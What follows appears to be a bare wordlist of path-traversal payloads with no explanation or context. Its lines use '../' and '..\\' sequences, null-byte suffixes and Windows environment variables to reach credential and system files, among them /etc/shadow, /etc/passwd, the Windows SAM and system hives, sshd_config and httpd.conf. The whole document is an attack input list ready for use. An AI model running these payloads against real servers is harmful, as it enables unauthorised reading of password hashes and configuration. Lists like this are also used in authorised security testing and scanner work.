/../../etc/passwd
../etc/passwd
../../../../../../etc/passwd
/../../etc/passwd%00
../../../../../../../../../../etc/passwd
/../../../../../../../../../../etc/passwd
/../../../../../../../../../../etc/shadow
/../../../../../../../../../../etc/hosts
/../../../../../../../../../../windows/system32/config/sam
/../../../../../../../../../../windows/system32/config/system
../../../boot.ini
../../../../../../../../boot.ini
../../../../../../../../../../boot.ini
..\\..\\..\\..\\..\\..\\boot.ini
..\\..\\..\\..\\..\\..\\..\\..\\..\\boot.ini
..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\system32\\drivers\\etc\\hosts
..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\system32\\config\\sam
%SYSTEMROOT%\\win.ini
%SYSTEMROOT%\\repair\\sam
%WINDIR%\\win.ini
%WINDIR%\\repair\\sam
C:\\boot.ini
C:\\windows\\win.ini
C:\\windows\\system32\\drivers\\etc\\hosts
C:\\windows\\system32\\config\\sam
%SYSTEMROOT%\\system32\\config\\sam
%WINDIR%\\repair\\sam
C:\\Windows\\repair\\sam
%SYSTEMROOT%\\windows\\system32\\drivers\\etc\\hosts
/../../../../../../../../../../etc/ssh/sshd_config
../../../../../../../../../../../../etc/ssh/sshd_config
../../../../../../../../../../../../../../etc/ssh/sshd_config
../../../../../../../../../../../../../../etc/shadow
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../etc/hosts
/../../../usr/local/apache2/conf/httpd.conf
/../../../usr/local/apache2/conf/httpd.conf
/../../../usr/local/apache2/conf/httpd.conf%00
../../../usr/local/apache2/conf/httpd.conf
../../../usr/local/apache2/conf/httpd.conf%00
../../../usr/local/apache2/conf/httpd.conf%20
